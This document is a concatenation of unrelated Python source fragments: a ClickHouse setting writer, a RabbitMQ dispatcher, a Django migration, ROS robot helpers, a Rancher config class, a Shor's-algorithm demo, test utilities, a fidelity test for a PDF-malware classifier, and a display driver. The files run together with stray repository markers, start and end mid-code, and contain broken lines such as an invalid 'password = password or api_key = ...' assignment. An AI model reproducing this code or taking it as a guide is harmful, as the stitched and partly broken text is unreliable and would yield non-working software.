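For example, write(0.5, buf) sends the text '0.5' via write_binary_str (a length-prefixed string), since str(value) is used below.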
""" write_binary_str(str(value), buf) class SettingMaxThreads(SettingUInt64): @classmethod def write(cls, value, buf): if value == 'auto': value = 0 super(SettingMaxThreads, cls).write(value, buf) chib0/asd-winter2019 import functools import pika from threading import Thread import urlpath from cortex import utils SCHEME = "rabbitmq" module_logger = utils.logging.get_module_logger(__file__) def get_dispatcher(url, topics, auto_start=True, **kwargs): """ creates a dispatcher and connects to the given url :param auto_start: bool: start the dispatcher right away (on False, this will not connect the dispatcher) :param url: where to connect :param topics: topics that could be published :param kwargs: anything to pass on to the dispatcher implementation (TODO) :return: a dispatcher if the url scheme matches, None otherwise """ url = urlpath.URL(url) if not url.scheme == SCHEME: return None topics = topics if not isinstance(topics, str) else (topics, ) dispatcher = RabbitQueueDispatcher(pika.ConnectionParameters(host=url.hostname, port=url.port), topics) if auto_start: dispatcher.start() return dispatcher class RabbitQueueDispatcher: Exchange = 'cortex' def __init__(self, endpoints, topics, reconnecting=True): self._logger = utils.logging.get_instance_logger(self) self._connection = None self._exchange = None self._channel = None self._endpoints = endpoints self._topics = topics self._ioloop = None self._reconnect = reconnecting self._queue = [] def dispatch(self, topic, data, again=False): self._logger.info(f"got {topic}, {data} to publish {'again' if again else ''}") if not self._send_with_existing_channel(topic, data): self._logger.debug("creating new channel to dispatch with") self._queue.insert(0 if again else len(self._queue), (topic, data)) self._connection.channel(on_open_callback=self._on_channel_opened) def publish(self, *args, **kwargs): """ this is a pure forward to `self.dispatch` :param args: :param kwargs: :return: """ return self.dispatch(*args, **kwargs) def _send_with_existing_channel(self, topic, data): if not self._channel: self._logger.debug("no channel, can't send with existing") return False with utils.logging.log_exception(self._logger, to_suppress=Exception, format=lambda e: f"had error sending {e}"): self._logger.debug(f"sending {topic}: {data}") self._channel.basic_publish(self._exchange, topic, data) return True return False def _on_channel_opened(self, channel): self._channel = channel self._flush_messages() def _flush_messages(self): """ flushes all the messages that were to be dispatched by the queue. :return: """ while self._queue: topic, data = self._queue.pop(0) try: self._channel.basic_publish(self._exchange, topic, data) except Exception: # there is an issue with this channel, we're trying to reconnect. self.dispatch(topic, data, again=True) break def _declare_topics(self, connection): """ Creates a channel, declares the topics that this dispatcher should be handling on the client. 
:param connection: The connection to declare topics for :return: """ self._logger.info("opening channel...") def has_channel(channel): self._logger.info("declaring topics & exchange...") channel.exchange_declare(exchange=self.Exchange, exchange_type='fanout') for i in self._topics: channel.queue_declare(i) self._exchange = self.Exchange self._channel = channel ch = connection.channel(on_open_callback=has_channel) def _connection_closed(self, something, reason): """ logs that the connection was closed :param something: :param reason: :return: """ self._logger.info(f"connection closed: {reason}") self._connection.ioloop.stop() if self._reconnect: self.start() def _create_and_start_conn(self): """ thread entry method. Creates and starts ioloop for a rabbitmq connection :return: Nothing """ self._connection = pika.SelectConnection(self._endpoints, on_open_callback=self._declare_topics, on_close_callback=self._connection_closed) self._connection.ioloop.start() def start(self): """ Creates a connection and starts its ioloop in a different thread :return: """ self._ioloop = Thread(target=self._create_and_start_conn, daemon=True) self._ioloop.start() def stop(self): """ closes the connection; blocks until it's closed """ self._connection.close() self._ioloop.join() @property def running(self): return self._ioloop.is_alive() # Generated by Django 2.2.6 on 2020-03-09 16:49 import datetime from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('yatranepal', '0027_auto_20200224_0041'), ] operations = [ migrations.AlterField( model_name='status', name='current_time', field=models.DateTimeField(default=datetime.datetime(2020, 3, 9, 22, 34, 40, 837198), verbose_name='Current Date and Time'), ), migrations.DeleteModel( name='Transportation', ), migrations.DeleteModel( name='TransportationType', ), ] 0 #!/usr/bin/env python # Software License Agreement (MIT License) # # Copyright (c) 2020, tri_star # All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. 
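#
# Helpers for the tri_star control_wrapper ROS interface: conversions between
# 4x4 homogeneous transforms and geometry_msgs Pose messages, plus a Robot class
# wrapping the get/set pose, joint, trajectory, reset, freedrive and gripper services.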
# # Author: , import numpy as np import rospy from std_msgs.msg import Bool from geometry_msgs.msg import Point, Quaternion, Pose from sensor_msgs.msg import JointState from control_wrapper.srv import SetPose from control_wrapper.srv import GetPose from control_wrapper.srv import GetJoints from control_wrapper.srv import SetJoints from control_wrapper.srv import Reset from control_wrapper.srv import SetTrajectory from control_wrapper.srv import CheckPose from tri_star import transformation_util from tri_star import constants def pose_matrix_to_msg(matrix): translation, rotation = transformation_util.decompose_homogeneous_transformation_matrix(matrix) position_msg = Point(translation[0], translation[1], translation[2]) quaternion_msg = Quaternion(rotation[0], rotation[1], rotation[2], rotation[3]) return Pose(position_msg, quaternion_msg) def pose_msg_to_matrix(pose_msg): position = np.array([pose_msg.position.x, pose_msg.position.y, pose_msg.position.z]) quaternion = np.array([pose_msg.orientation.x, pose_msg.orientation.y, pose_msg.orientation.z, pose_msg.orientation.w]) return transformation_util.get_homogeneous_transformation_matrix_from_quaternion(quaternion, position) def robot_topic(topic): robot = constants.get_robot_platform() side = constants.get_robot_platform_side() return "/{}/control_wrapper/{}/{}".format(robot, side, topic) class Robot(object): def __init__(self): self.free_drive_pub = rospy.Publisher(robot_topic("enable_freedrive"), Bool, queue_size=10) self.connect_pub = rospy.Publisher(robot_topic("connect"), Bool, queue_size=10) self.gripper_pub = rospy.Publisher(robot_topic("gripper"), Bool, queue_size=10) def get_robot_pose(self): service_topic = robot_topic("get_pose") rospy.wait_for_service(service_topic) get_current_pose = rospy.ServiceProxy(service_topic, GetPose) current_pose = None try: current_pose = pose_msg_to_matrix(get_current_pose().pose) except rospy.ServiceException as exc: print "Service did not process request: " + str(exc) return current_pose def get_robot_angle(self): service_topic = robot_topic("get_joints") rospy.wait_for_service(service_topic) get_current_joints = rospy.ServiceProxy(service_topic, GetJoints) current_joints = None try: current_joints = get_current_joints().joints except rospy.ServiceException as exc: print "Service did not process request: " + str(exc) return current_joints def set_robot_angle(self, joint_names, joint_angles): # angles is in degree is_reached = False try: service_topic = robot_topic("set_joints") rospy.wait_for_service(service_topic) set_current_joints = rospy.ServiceProxy(service_topic, SetJoints) joints = JointState() joints.name = joint_names joints.position = [np.deg2rad(angle) for angle in joint_angles] is_reached = set_current_joints(joints).is_reached except rospy.ServiceException as exc: print "Service did not process request: " + str(exc) return is_reached def set_robot_pose(self, pose_matrix, ask_before_move=True): if ask_before_move: raw_input("press any key to execute the trajectory") service_topic = robot_topic("set_pose") rospy.wait_for_service(service_topic) set_current_pose = rospy.ServiceProxy(service_topic, SetPose) is_reached = False try: pose_msg = pose_matrix_to_msg(pose_matrix) response = set_current_pose(pose_msg) pose = response.response_pose is_reached = response.is_reached if is_reached: print "[robot_util][set_robot_pose] robot reach pose SUCCEEDED" else: print "[robot_util][set_robot_pose] robot reach pose FAILED" print "[robot_util][set_robot_pose] pose to set" print pose_matrix print 
"[robot_util][set_robot_pose] pose reached" print self.get_robot_pose() except rospy.ServiceException as exc: print "Service did not process request: " + str(exc) return is_reached def execute_trajectory(self, ee_trajectory, ask_before_move=True): if ask_before_move: raw_input("press any key to execute trajectory...") service_topic = robot_topic("follow_trajectory") rospy.wait_for_service(service_topic) follow_trajectory = rospy.ServiceProxy(service_topic, SetTrajectory) is_reached = False try: poses = [pose_matrix_to_msg(i) for i in ee_trajectory] response = follow_trajectory(poses) current_pose = response.final_pose is_reached = response.is_reached print "is_reached: ", is_reached print "result pose (follow_trajectory)" print current_pose except rospy.ServiceException as exc: print "Service did not process request: " + str(exc) return is_reached # move robot out of work boundary def set_perceive_goal_pose(self, ask_before_move=True): joint_names = [] joint_angles = [] # in degrees if constants.get_robot_platform() == constants.ROBOT_PLATFORM_BAXTER: joint_names = [] joint_angles = [] elif constants.get_robot_platform() == constants.ROBOT_PLATFORM_UR5E: print "MOVING TO PRE GOAL LOCATION" joint_names = ["shoulder_pan_joint", "shoulder_lift_joint", "elbow_joint", "wrist_1_joint", "wrist_2_joint", "wrist_3_joint"] joint_angles = [-175.0, -118.0, -55.0, 115., -93, -6.] elif constants.get_robot_platform() == constants.ROBOT_PLATFORM_KUKA: joint_names = [] joint_angles = [] self.set_robot_angle(joint_names, joint_angles) def reset_robot(self, ask_before_move=True): if constants.is_simulator(): if constants.get_robot_platform() == constants.ROBOT_PLATFORM_BAXTER: return True if ask_before_move: raw_input("press any key to reset the robot...") service_topic = robot_topic("reset") rospy.wait_for_service(service_topic) reset = rospy.ServiceProxy(service_topic, Reset) is_reached = False try: is_reached = reset().is_reached except rospy.ServiceException as exc: print "Service did not process request: " + str(exc) return is_reached def free_drive_robot(self, enable): self.free_drive_pub.publish(enable) def connect_robot(self, enable): rospy.sleep(0.5) self.connect_pub.publish(enable) rospy.sleep(0.5) def gripper_robot(self, enable, ask_before_move=True): if ask_before_move: if enable: raw_input("press any key to open the gripper") else: raw_input("press any key to close the gripper") self.gripper_pub.publish(enable) rospy.sleep(2.0) def check_pose(self, pose): service_topic = robot_topic("check_pose") rospy.wait_for_service(service_topic) check_pose = rospy.ServiceProxy(service_topic, CheckPose) could_reach = False joint_changes = np.inf try: response = check_pose(pose_matrix_to_msg(pose)) could_reach = response.could_reach joint_changes = response.joint_changes except rospy.ServiceException as exc: print "Service did not process request: " + str(exc) return could_reach, joint_changes1-10 from lazycls.envs import * from lazycls.types import * from lazycls import BaseModel, classproperty from lazycls.funcs import timed_cache from lazycls.serializers import Base from kubernetes.client import Configuration from lazycls.base import set_modulename from lazycls.utils import get_parent_path, to_path, Path from .logz import get_logger DefaultHeaders = { 'Accept': 'application/json', 'Content-Type': 'application/json' } DefaultCacheDir = get_parent_path(__file__).joinpath('.kctlcache') logger = get_logger() set_modulename('kctl') # This is the base KctlCfg class that you can access natively without requiring 
initialization. # To manage multiple contexts, use the class below. class KctlCfg: host = envToStr('KCTL_HOST', 'http://localhost') api_key = envToStr('KCTL_API_KEY') api_key_prefix = envToStr('KCTL_API_KEY_PREFIX', 'token:') api_token = envToStr('KCTL_API_TOKEN') username = envToStr('KCTL_API_USERNAME') password = Str('') auth_prefix = envToStr('KTCL_AUTH_PREFIX', 'authorization') @classmethod @timed_cache(60) def get_headers(cls, username: str = None, password: str = None, api_key: str = None, api_token: str = None, auth_prefix: str = None, api_key_prefix: str = None): """ Logic Sequence: - username and password if provided - fallback to token if provided - else default headers """ _headers = DefaultHeaders username = username or cls.username password = password or api_key = api_key or cls.api_key api_token = api_token or cls.api_token auth_prefix = auth_prefix or cls.auth_prefix api_key_prefix = api_key_prefix or cls.api_key_prefix if username and password: _headers[auth_prefix] = f'Basic {Base.b64_encode(username + ":" + password)}' elif api_token: _headers[auth_prefix] = f'Bearer {api_token}' elif api_key: _headers[auth_prefix] = f'{api_key_prefix}{api_key}' return _headers @classmethod @timed_cache(60) def get_config(cls, host: str = None, username: str = None, password: str = None, api_key: str = None, api_token: str = None, auth_prefix: str = None, api_key_prefix: str = None): """ Native Kubernetes Python Configuration Because of how oddly the configuration is needed to be set, this is a helper method to make sure its properly set up. """ host = host or cls.host username = username or cls.username password = password or api_key = api_key or cls.api_key api_token = api_token or cls.api_token auth_prefix = auth_prefix or cls.auth_prefix api_key_prefix = api_key_prefix or cls.api_key_prefix cfg = Configuration(host=host) if username and password: cfg.api_key_prefix[auth_prefix] = 'basic' cfg.api_key[auth_prefix] = Base.b64_encode(username + ":" + password) elif cls.api_token: cfg.api_key_prefix[auth_prefix] = 'bearer' cfg.api_key[auth_prefix] = api_token elif cls.api_key: cfg.api_key_prefix[auth_prefix] = api_key_prefix cfg.api_key[auth_prefix] = api_key return cfg @classproperty def headers(cls): return cls.get_headers() @classproperty def config(cls): return cls.get_config() class RancherCtx(BaseModel): host: str cluster_name: str cluster_id: str registration_token: str @property def cluster_url(self): # https://localhost/k8s/clusters/c-m-xxxx if self.cluster_name == 'local': return self.host return f'{self.host}/k8s/clusters/{self.cluster_id}' class KctlContextCfg: def __init__(self, host: str = KctlCfg.host, api_version: str = 'v1', api_token: str = KctlCfg.api_token, ssl_verify: bool = True, strict: bool = False, cache_time: int = 86400, cache_dir: Union[Path, str] = DefaultCacheDir, rancher_default_cluster: str = None, rancher_fleet_name: str = 'fleet-default', clusters_enabled: List[str] = [], clusters_disabled: List[str] = [] ): self.host = host or KctlCfg.host self.token = api_token or KctlCfg.api_token self.api_version = envToStr('KCTL_API_VERSION', api_version or 'v1') self.ssl_verify = envToBool('KCTL_SSL_VERIFY', str(ssl_verify)) self.strict = envToBool('KCTL_STRICT', str(strict)) self.cache_time = envToInt('KCTL_CACHE_TIME', cache_time) self.cache_dir = to_path(envToStr('KCTL_CACHE_DIR', None) or cache_dir) self.cache_dir.mkdir(parents = True, exist_ok = True) self.rancher_default_cluster = envToStr('KCTL_RANCHER_DEFAULT_CLUSTER', rancher_default_cluster) 
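# The remaining settings follow the same pattern: the KCTL_* environment variable, when set, takes precedence over the constructor argument.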
self.rancher_fleet_name = envToStr('KCTL_RANCHER_FLEET_NAME', rancher_fleet_name) # If both are empty, then it will assume all clusters are enabled. self.clusters_enabled = envToList('KCTL_CLUSTERS_ENABLED', clusters_enabled) self.clusters_disabled = envToList('KCTL_CLUSTERS_DISABLED', clusters_disabled) self.rancher_ctxs: Dict[str, RancherCtx] = {} def build_rancher_ctx(self, v1_client, v3_client): """After rancher client initialization, will populate the cluster-ids from calling the api""" clusters = v3_client.list_cluster() registration_tokens = v1_client.list_management_cattle_io_clusterregistrationtoken() all_enabled = not self.clusters_disabled and not self.clusters_enabled for cluster in clusters.data: if not all_enabled and (cluster.name in self.clusters_disabled or (self.clusters_enabled and cluster.name not in self.clusters_enabled)): continue if not self.rancher_default_cluster: self.rancher_default_cluster = cluster.name token = [t.status.token for t in registration_tokens.data if cluster.id in t.id] token = token[0] if token else '' self.rancher_ctxs[cluster.name] = RancherCtx( host = self.host, cluster_name = cluster.name, cluster_id = cluster.id, registration_token = token ) def get_kctx(self, cluster_name: str = None, set_default: bool = False): if not cluster_name and not self.rancher_ctxs and not self.rancher_default_cluster: return None if not self.rancher_ctxs.get(cluster_name) and self.rancher_default_cluster: logger.error(f'Cannot retrieve ctx: {cluster_name}. Building Default: {self.rancher_default_cluster}') cluster_name = self.rancher_default_cluster ctx = self.rancher_ctxs.get(cluster_name) if not ctx: logger.error(f'No Context for {ctx} was found.') return None if ctx and set_default: self.rancher_default_cluster = ctx.cluster_name return ctx @timed_cache(60) def get_config(self, cluster_name: str = None): """ Native Kubernetes Python Configuration Because of how oddly the configuration is needed to be set, this is a helper method to make sure its properly set up. 
""" if not self.rancher_ctxs and not self.rancher_default_cluster: return KctlCfg.config ctx = self.get_kctx(cluster_name) if not ctx: return KctlCfg.get_config(host = self.host, api_token = self.token) return KctlCfg.get_config(host = ctx.cluster_url, api_token = self.token) def get_url(self, cluster_name: str = None, set_default: bool = False): if not self.rancher_ctxs and not self.rancher_default_cluster: url = self.host else: ctx = self.get_kctx(cluster_name, set_default = set_default) url = ctx.cluster_url or self.host if not url.endswith(self.api_version): url += f'/{self.api_version}' return url @property def headers(self): return KctlCfg.get_headers(api_token = self.token) @property def config(self): return self.get_config() @property def url(self): return self.get_url() @property def is_enabled(self): return bool(self.token and self.host) def validate_fleet_url(self, url: str): if 'management.cattle.io.clusterregistrationtokens' in url: return url if self.api_version == 'v1' and self.rancher_fleet_name not in url and 'k8s/cluster' not in url: url += f'/{self.rancher_fleet_name}' return url import sys from math import log, ceil from Quantum import quantum_period """ This code is a simplified implementation of the Shor's Algorithm for N=15 The code is written to run on a 5Qbit IBMQ quantum processor """ def main(): N = 3*5 print ("\n") print ("===========================================") print (" SHOR'S ALGPRITHM") print ("===========================================") print ("\n") #N is the prime factor to be factorized, # (Currently, the IBMQ processor has 5qbits, # So the number to be factorized should be less 2^5 = 32) Check(N) # for large N's randint() should be used to generate guesses instead of range() for a in range(2, N-1): divisor = gcd(a, N) if divisor!=1: #we found a non trivial factor of N print("Factors found without shor: N=", divisor, " * " , N/divisor) break else: p1, p2 = Shor(N, a) if(p1 != 1 and p2 != 1): print("Factors found with shor: N =", int(p1), "*", int(p2)) break # https://en.wikipedia.org/wiki/Shor%27s_algorithm#Procedure def Check(N): # checks if N is even if N % 2 == 0: print("Factors found: N =", N/2, "*", 2) raise ValueError('N is even, 2 is a trivial factor') # checks if N has any integer roots N^(1/k), for 2 < k < log2(N) for k in range(2,int(log(N,2))): root = N**(1/k) if root.is_integer(): raise ValueError('N has a natural nth root. 
N = {}^{}'.format(int(root), k)) # https://en.wikipedia.org/wiki/Greatest_common_divisor def gcd(a, b): # Compute the GCD with Euclide algorithm while b: a, b = b, a%b return a def Shor(N, a): n_bit = ceil(log(N,2)) # amount of bits necessary for given N print('Using {} qubits'.format(n_bit)) # https://en.wikipedia.org/wiki/Shor%27s_algorithm#Finding_the_period r = quantum_period(a, N, n_bit) # Quantum part of the algorithm # https://en.wikipedia.org/wiki/Shor%27s_algorithm#Obtaining_factors_from_period if r % 2 == 0 : if a**(r/2) % N != -1: p1 = gcd(a**(r/2)-1,N) p2 = gcd(a**(r/2)+1,N) print ("\n Attempt N =", int(p1), "*", int(p2)) if (p1!=1 and p1!=N): return p1, N/p1 if (p2!=1 and p2!=N): return p2, N/p2 return p1, p2 if __name__ == '__main__': main() 1-10 from django.test import TestCase from example_app.views import ChatterBotApiView class MockResponse(object): def __init__(self, pk): self.session = {'conversation_id': pk} class ViewTestCase(TestCase): def setUp(self): super(ViewTestCase, self).setUp() self.view = ChatterBotApiView() def test_get_conversation(self): conversation_id = self.view.chatterbot.storage.create_conversation() mock_response = MockResponse(conversation_id) conversation = self.view.get_conversation(mock_response) self.assertEqual(conversation_id, conversation.id) def test_get_conversation_invalid(self): mock_response = MockResponse(0) session = self.view.get_conversation(mock_response) self.assertNotEqual(session.id, 'test-session-id') def test_get_conversation_nonexistent(self): mock_response = MockResponse(None) mock_response.session = {} session = self.view.get_conversation(mock_response) self.assertNotEqual(session.id, 'test-session-id') 1-10 from totalimpact import fakes import logging, time, random, string, datetime # setup logging class ContextFilter(logging.Filter): def filter(self, record): record.msg = "test '{name}': {msg}".format( name=self.test_name, msg=record.msg ) return True logger = logging.getLogger("ti.testers") class CollectionTester(object): def test(self, method): start = time.time() interaction_name = ''.join(random.choice(string.ascii_lowercase) for x in range(5)) # all log messages will have the name of the test. f = ContextFilter() f.test_name = interaction_name logger.addFilter(f) logger.info(u"{classname}.{action_type}('{interaction_name}') starting now".format( classname=self.__class__.__name__, action_type=method, interaction_name=interaction_name )) try: error_str = None result = getattr(self, method)(interaction_name) except Exception, e: error_str = e.__repr__() logger.exception(u"{classname}.{method}('{interaction_name}') threw an error: '{error_str}'".format( classname=self.__class__.__name__, method=method, interaction_name=interaction_name, error_str=error_str )) result = None end = time.time() elapsed = end - start logger.info(u"{classname}.{method}('{interaction_name}') finished in {elapsed} seconds.".format( classname=self.__class__.__name__, method=method, interaction_name=interaction_name, elapsed=round(elapsed, 2) )) # this is a dumb way to do the times; should be using time objects, not stamps report = { "start": datetime.datetime.fromtimestamp(start).strftime('%m-%d %H:%M:%S'), "end": datetime.datetime.fromtimestamp(end).strftime('%m-%d %H:%M:%S'), "elapsed": round(elapsed, 2), "action": "collection." + method, "name": interaction_name, "result":result, "error_str": error_str } logger.info(u"{classname}.{method}('{interaction_name}') finished. 
Here's the report: {report}".format( classname=self.__class__.__name__, method=method, interaction_name=interaction_name, report=str(report) )) return report def create(self, interaction_name): ''' Imitates a user creating and viewing a collection. Should be run before commits. Is also run regularly on the production server. Would be better to walk through the actual pages with a headless browser, but they are so heavy on js, that seems very hard. Soo we use the fake pages to imitate the AJAX calls the js pages make. ''' logger.debug(u"in the 'create' method now.") ccp = fakes.CreateCollectionPage() sampler = fakes.IdSampler() ccp.enter_aliases_directly([["doi", x] for x in sampler.get_dois(5)]) ccp.get_aliases_with_importers("github", sampler.get_github_username()) # include a paper known to be in the DB: it is in the official sample collection ccp.enter_aliases_directly([["doi", "10.1186/1471-2148-9-37"]]) logger.info(u"all aliases in collection {aliases}".format(aliases=str(ccp.aliases))) ccp.set_collection_name(interaction_name) return ccp.press_go_button() def read(self, interaction_name, collection_name="kn5auf"): '''Imitates a user viewing the sample collection. This method is useful for testing, and should be run before commits. However, in production we use StillAlive to actually load and check the report page using a headless browswer, which is better than this simulation. ''' logger.debug(u"in the 'read' method now.") report_page = fakes.ReportPage(collection_name) result = report_page.poll() return result def update(self, interaction_name, collection_name="kn5auf"): '''Imitates a user updating a collection Not implemented yet because isn't as common or important. ''' pass def delete(self, interaction_name): '''Imitates a user updating a collection Listed for CRUD completeness, but don't think we need this. 
''' pass import os os.environ["CUDA_VISIBLE_DEVICES"] = "1" from Pdf_malware.Scripts.LEMNA import xai_rnn from Pdf_malware.Scripts.utils import * import matplotlib.pyplot as plt import innvestigate class FidelityMetric(): def __init__(self, data, model, important, maxselNum, neg_x, step = 1): self.data = data.copy() self.important = important self.maxselNum = maxselNum self.neg_x = neg_x self.step = step self.iter = int(maxselNum / step) self.model = model def AugmentTest(self): AugmentRes = [] for i in range(self.iter): testdata = self.neg_x.copy() xpos = np.arange(0, len(self.data)) for j in range(i * self.step): pos = np.int32(self.important[:, j]) testdata[xpos, pos] = self.data[xpos, pos] AugmentRes.append(np.sum(self.model.predict(testdata) > 0.5) / len(self.data)) return AugmentRes def DeductionTest(self): DeductionRes = [] for i in range(self.iter): testdata = self.data.copy() xpos = np.arange(0, len(self.data)) for j in range(i * self.step): pos = np.int32(self.important[:, j]) testdata[xpos, pos] = 1 - self.data[xpos, pos] DeductionRes.append(np.sum(self.model.predict(testdata) > 0.5)/ len(self.data)) return DeductionRes class FidelityTest(): def __init__(self, model, puppetmodel, x, y, neg_x, testNum = 100, selNum = 10, step = 1): self.model = model self.puppetmodel = puppetmodel self.x = x[0 : testNum] self.y = y[0 : testNum] self.testNum = testNum self.selNum = selNum self.neg_x = neg_x[0 : testNum] self.step = step self.baseline = [ "gradient", #gradient "integrated_gradients", "deep_taylor", ] def Denasfidelity(self, ): importantInx = [] for i in range(self.testNum): x = self.x[i: i + 1] rule = [] importantpos = [] while len(rule) <= self.selNum: activationState = calAcStateFromRule(rule, self.model) contributionVec = calContributionVec(self.puppetmodel, activationState) for pt in rule: contributionVec[int(pt/2)] = 0 add = 0 while add <= self.step: newpt = np.argmax(np.abs(contributionVec)) if contributionVec[newpt] > 0: newpt = newpt * 2 + 1 else: newpt = newpt * 2 pos = int(newpt / BIT) val = newpt % BIT if x[0, pos] == val: importantpos.append(pos) rule.append(newpt) add += 1 contributionVec[pos] = 0 importantInx.append(np.array(importantpos)) importantInx = np.array(importantInx) print("denas explain finished") RuleSet = [] for i in range(len(self.x)): rule = [[j, self.x[i, j]] for j in importantInx[i]] RuleSet.append(rule) f = open('../RuleSet/denas.pkl', 'wb') pickle.dump(RuleSet, f) f.close() metric = FidelityMetric(self.x, self.model, importantInx, self.selNum, self.neg_x, step = self.step) a = metric.AugmentTest() b = metric.DeductionTest() return a, b def Lemnafidelity(self,): importantInx = np.zeros_like(self.x) for i in range(self.testNum): x_test = self.x[i: (i + 1)] xai_test = xai_rnn(self.model, x_test) importantInx[i] = np.array(xai_test.xai_feature(500)) print("lemna finish extract explanation") RuleSet = [] for i in range(len(self.x)): rule = [[j, self.x[i, j]] for j in importantInx[i]] RuleSet.append(rule) f = open('../RuleSet/lemna.pkl', 'wb') pickle.dump(RuleSet, f) f.close() metric = FidelityMetric(self.x, self.model, importantInx, self.selNum, self.neg_x, step = self.step) a = metric.AugmentTest() b = metric.DeductionTest() return a, b def Baselinefidelity(self, i_num, num = 2): analysis = np.zeros_like(self.x, dtype=np.float32) step = int(self.testNum / num) analyzer= innvestigate.create_analyzer(self.baseline[i_num], self.model) for i in range(num): st = int((i) * step) ed = int((i + 1) * step) analysis[st : ed] = analyzer.analyze(self.x[st : ed]) 
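# argsort on the negated attributions ranks each sample's features from most to least important.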
importIndex = np.argsort(analysis * -1, axis= 1) print(self.baseline[i_num], "finish explanation") RuleSet = [] for i in range(len(self.x)): rule = [[j, self.x[i, j]] for j in importIndex[i]] RuleSet.append(rule) f = open('../RuleSet/' + self.baseline[i_num] + '.pkl', 'wb') pickle.dump(RuleSet, f) f.close() metric = FidelityMetric(self.x, self.model, importIndex, self.selNum, self.neg_x) a = metric.AugmentTest() b = metric.DeductionTest() return a, b def getFidelityRes(fid ): baselineNum = 3 AugplotArr = np.zeros([10, baselineNum + 2]) DecplotArr = np.zeros([10, baselineNum + 2]) x_axis = np.arange(0, 10, 1) for i in range(baselineNum): AugplotArr[:, i], DecplotArr[:, i] = fid.Baselinefidelity(i) AugplotArr[:, baselineNum], DecplotArr[:, baselineNum] = fid.Lemnafidelity() AugplotArr[:, baselineNum + 1], DecplotArr[:, baselineNum + 1] = fid.Denasfidelity() print('AugplotArr') print(AugplotArr) print('DecplotArr') print(DecplotArr) np.savetxt("../Results/AugplotArr.csv", AugplotArr, delimiter=',') np.savetxt("../Results/DecplotArr.csv", DecplotArr, delimiter=',') name = ["gradient", "ig", "deeptaylor", 'lemna', 'denas'] L = [] for i in range(baselineNum + 2): l, = plt.plot(x_axis, AugplotArr[:, i], label=str(i)) L.append(l) plt.legend(handles=L, labels=name) plt.savefig('../Results/AugplotArr.png') plt.cla() #plt.show() name = ["gradient", "ig","deeptaylor", 'lemna', 'denas'] L = [] for i in range(baselineNum + 2): l, = plt.plot(x_axis, DecplotArr[:, i], label=str(i)) L.append(l) plt.legend(handles=L, labels=name) plt.savefig('../Results/DecplotArr.png') #plt.show() def main(): model = load_model("../model/MLP_model.h5") x, y = loaddata("../data/train_model_data.pkl") index = np.random.choice(np.arange(len(x)), 3000) x = x[index] y = y[index] np.save('../Results/x', x) np.save('../Results/y', y) pred_y = model.predict(x, batch_size=5000) > 0.5 pos_x = x[np.where(pred_y > 0)[0]] neg_x = x[np.where(pred_y == 0)[0]] puppetModel = getPuppetModel("../model/MLP_model.h5") fid = FidelityTest(model, puppetModel, pos_x, y, neg_x, testNum= 100, step = 1) getFidelityRes(fid) print("finish accuracy experiment") if __name__ == "__main__": main() from ipmi import ipmitool, IPMIError rgb.py import framebuf import utime import ustruct def color565(r, g, b): return (r & 0xf8) << 8 | (g & 0xfc) << 3 | b >> 3 class DummyPin: """A fake gpio pin for when you want to skip pins.""" OUT = 0 IN = 0 PULL_UP = 0 PULL_DOWN = 0 OPEN_DRAIN = 0 ALT = 0 ALT_OPEN_DRAIN = 0 LOW_POWER = 0 MED_POWER = 0 HIGH_PWER = 0 IRQ_FALLING = 0 IRQ_RISING = 0 IRQ_LOW_LEVEL = 0 IRQ_HIGH_LEVEL = 0 def __call__(self, *args, **kwargs): return False init = __call__ value = __call__ out_value = __call__ toggle = __call__ high = __call__ low = __call__ on = __call__ off = __call__ mode = __call__ pull = __call__ drive = __call__ irq = __call__ class Display: _PAGE_SET = None _COLUMN_SET = None _RAM_WRITE = None _RAM_READ = None _INIT = () _ENCODE_PIXEL = ">H" _ENCODE_POS = ">HH" _DECODE_PIXEL = ">BBB" def __init__(self, width, height): self.width = width self.height = height self.x = 0 self.y = 0 self._fg = 0xFFFF self._bg = 0x0000 self.init() def init(self): """Run the initialization commands.""" for command, data in self._INIT: self._write(command, data) def _block(self, x0, y0, x1, y1, data=None): """Read or write a block of data.""" self._write(self._COLUMN_SET, self._encode_pos(x0, x1)) self._write(self._PAGE_SET, self._encode_pos(y0, y1)) if data is None: size = ustruct.calcsize(self._DECODE_PIXEL) return self._read(self._RAM_READ, (x1 - 
x0 + 1) * (y1 - y0 + 1) * size) self._write(self._RAM_WRITE, data) def _encode_pos(self, a, b): """Encode a postion into bytes.""" return ustruct.pack(self._ENCODE_POS, a, b) def _encode_pixel(self, color): """Encode a pixel color into bytes.""" return ustruct.pack(self._ENCODE_PIXEL, color) def _decode_pixel(self, data): """Decode bytes into a pixel color.""" return color565(*ustruct.unpack(self._DECODE_PIXEL, data)) def pixel(self, x, y, color=None): """Read or write a pixel.""" if color is None: return self._decode_pixel(self._block(x, y, x, y)) if not 0 <= x < self.width or not 0 <= y < self.height: return self._block(x, y, x, y, self._encode_pixel(color)) return self def fill_rectangle(self, x, y, width, height, color): """Draw a filled rectangle.""" if color is None: color = self._fg x = min(self.width - 1, max(0, x)) y = min(self.height - 1, max(0, y)) w = min(self.width - x, max(1, width)) h = min(self.height - y, max(1, height)) self._block(x, y, x + w - 1, y + h - 1, b'') chunks, rest = divmod(w * h, 512) pixel = self._encode_pixel(color) if chunks: data = pixel * 512 for count in range(chunks): self._write(None, data) self._write(None, pixel * rest) self.x = x self.y = y return self def fill(self, color=None): """Fill whole screen.""" if color is not None: self._bg = color return self.fill_rectangle(0, 0, self.width, self.height, color) def hline(self, x, y, width, color=None): """Draw a horizontal line.""" return self.rect(x, y, width, 1, color) def vline(self, x, y, height, color=None): """Draw a vertical line.""" return self.rect(x, y, 